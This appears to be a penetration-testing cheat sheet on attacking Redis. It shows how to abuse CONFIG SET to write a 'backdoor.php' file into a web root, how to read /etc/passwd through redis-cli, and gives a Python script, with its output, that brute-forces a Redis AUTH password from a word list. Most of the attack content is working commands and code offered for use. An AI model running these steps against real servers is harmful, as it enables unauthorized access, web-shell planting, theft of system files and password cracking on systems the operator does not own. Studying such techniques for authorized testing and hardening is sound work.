REDIS - Export File / Read File / Cracker

Export File

If redis and web service are both on the same server, maybe we can get a shell.

1. Connect to redis port (default: 6379).

1. Get current configuration

:> CONFIG GET *
  ) "dbfilename"
  ) "dump.rdb"
  ) "requirepass"
  ) ""
  ) "masterauth"
  ) ""
  ) "unixsocket"
  ) ""
  ) "logfile"
 ) ""
 ) "pidfile"
 ) "/var/run/redis_6379.pid"
 ) "maxmemory"
 ) "3221225472"
 ) "maxmemory-samples"
 ) "5"
 ) "timeout"
 ) "0"
 ) "tcp-keepalive"
 ) "0"
 ) "auto-aof-rewrite-percentage"
 ) "100"
 ) "auto-aof-rewrite-min-size"
 ) "67108864"
 ) "hash-max-ziplist-entries"
 ) "512"
 ) "hash-max-ziplist-value"
 ) "64"
 ) "list-max-ziplist-entries"
 ) "512"
 ) "list-max-ziplist-value"
 ) "64"
 ) "set-max-intset-entries"
 ) "512"
 ) "zset-max-ziplist-entries"
 ) "128"
 ) "zset-max-ziplist-value"
 ) "64"
 ) "hll-sparse-max-bytes"
 ) "3000"
 ) "lua-time-limit"
 ) "5000"
 ) "slowlog-log-slower-than"
 ) "10000"
 ) "latency-monitor-threshold"
 ) "0"
 ) "slowlog-max-len"
 ) "128"
 ) "port"
 ) "6379"
 ) "tcp-backlog"
 ) "511"
 ) "databases"
 ) "16"
 ) "repl-ping-slave-period"
 ) "10"
 ) "repl-timeout"
 ) "60"
 ) "repl-backlog-size"
 ) "1048576"
 ) "repl-backlog-ttl"
 ) "3600"
 ) "maxclients"
 ) "10000"
 ) "watchdog-period"
 ) "0"
 ) "slave-priority"
 ) "100"
 ) "min-slaves-to-write"
 ) "0"
 ) "min-slaves-max-lag"
 ) "10"
 ) "hz"
 ) "10"
 ) "cluster-node-timeout"
 ) "15000"
 ) "cluster-migration-barrier"
 ) "1"
 ) "cluster-slave-validity-factor"
 ) "10"
 ) "repl-diskless-sync-delay"
 ) "5"
 ) "cluster-require-full-coverage"
 ) "yes"
 ) "no-appendfsync-on-rewrite"
 ) "no"
 ) "slave-serve-stale-data"
 ) "yes"
 ) "slave-read-only"
 ) "yes"
 ) "stop-writes-on-bgsave-error"
 ) "yes"
 ) "daemonize"
 ) "yes"
 ) "rdbcompression"
 ) "yes"
 ) "rdbchecksum"
 ) "yes"
 ) "activerehashing"
) "yes"
) "repl-disable-tcp-nodelay"
) "no"
) "repl-diskless-sync"
) "no"
) "aof-rewrite-incremental-fsync"
) "yes"
) "aof-load-truncated"
) "yes"
) "appendonly"
) "no"
) "dir"
) "/var/redis/6379"
) "maxmemory-policy"
) "noeviction"
) "appendfsync"
) "everysec"
) "save"
) "900 1 300 10 60 10000"
) "loglevel"
) "notice"
) "client-output-buffer-limit"
) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"
) "unixsocketperm"
) "0"
) "slaveof"
) ""
) "notify-keyspace-events"
) ""
) "bind"
) ""
:> 
           

1. Export DB File.

   During pentesting, we can export a web shell also.

:> CONFIG SET dir /var/www/
OK
:> CONFIG SET dbfilename backdoor.php
OK
:> SET data "<?php phpinfo(); ?>"
OK
:> SAVE
OK
:> QUIT
           

We can view php information here.

root@kali:~# curl -o data.txt  http://localhost:8080/backdoor.php
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
                 k       --:--:-- --:--:-- --:--:-- k
root@kali:~# grep --color -i -n -a phpinfo data.txt 
:<title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
           

1. Restore REDIS Configuration

Clear redis operation data, and restore previous configuration.

:> CONFIG SET dbfilename dump.rdb
OK
:> CONFIG SET dir /var/redis//
OK
:> KEYS *
) "bar"
) "key"
) "foo"
) "data"
:> DEL data
(integer) 
:> KEYS *
) "bar"
) "key"
) "foo"
:> SAVE
OK
           

Read File

redis-cli -x HSET passwd text </etc/passwd
redis-cli --raw HGET passwd text >/tmp/passwd 
redis-cli DEL passwd
           

REDIS Cracker

If redis server sets a password, we can crack it with following demo.

#!/usr/bin/env python
# -*- coding: utf8 -*-

import socket
import logging


logging.basicConfig(level=logging.DEBUG, 
                    format="[*] %(funcName)s - %(message)s")

logger = logging.getLogger('redis_cracker')
BUFSIZE = 


def crack_redis(host, port, password):
    logger.debug('cracking resdis %s:%s with %s' % (host, port, password))

    # create a socket for redis connection
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ret = sock.connect_ex((host, port))

    # failed to make a redis connection 
    if ret != :
        logging.info("failed to connect to redis")
        return False, None

    # logger.debug('Check AUTH is enable or not')

    # send a INFO request 
    sock.send('INFO\r\n')

    # recv socket resp
    data = sock.recv(BUFSIZE)

    if "NOAUTH Authentication required" in data:
        # crack password
        sock.send('AUTH %s\r\n' % password)
        data = sock.recv(BUFSIZE)

        # auth successfully
        if "+OK" in data:
            logging.info("redis pass: [%s]\n" % password)
            return True, password

        # auth failed
        else:
            logging.debug("%s\n" % data.strip())
    else:
        logging.info("No password protection\n")
        return True, None

    return False, None


if __name__ == "__main__":
    passwords = ['admin', 'pass', 'password', '123']

    host = "localhost"
    port = 

    for p in passwords:
        bool, pwd = crack_redis(host, port, p)
        if bool:
            break
           

Now, we can crack localhost redis server.

root@kali:~# python2 crack_redis.py 
[*] crack_redis - cracking resdis localhost: with admin
[*] crack_redis - -ERR invalid password

[*] crack_redis - cracking resdis localhost: with pass
[*] crack_redis - -ERR invalid password

[*] crack_redis - cracking resdis localhost: with password
[*] crack_redis - redis pass: [password]
           

Redis pass: [password].

root@kali:~# redis-cli -h localhost -p 6379
localhost:> AUTH password
OK
           

Authentication is successful.

References

CN - Trying to hack Redis via HTTP requests

EN - Trying to hack Redis via HTTP requests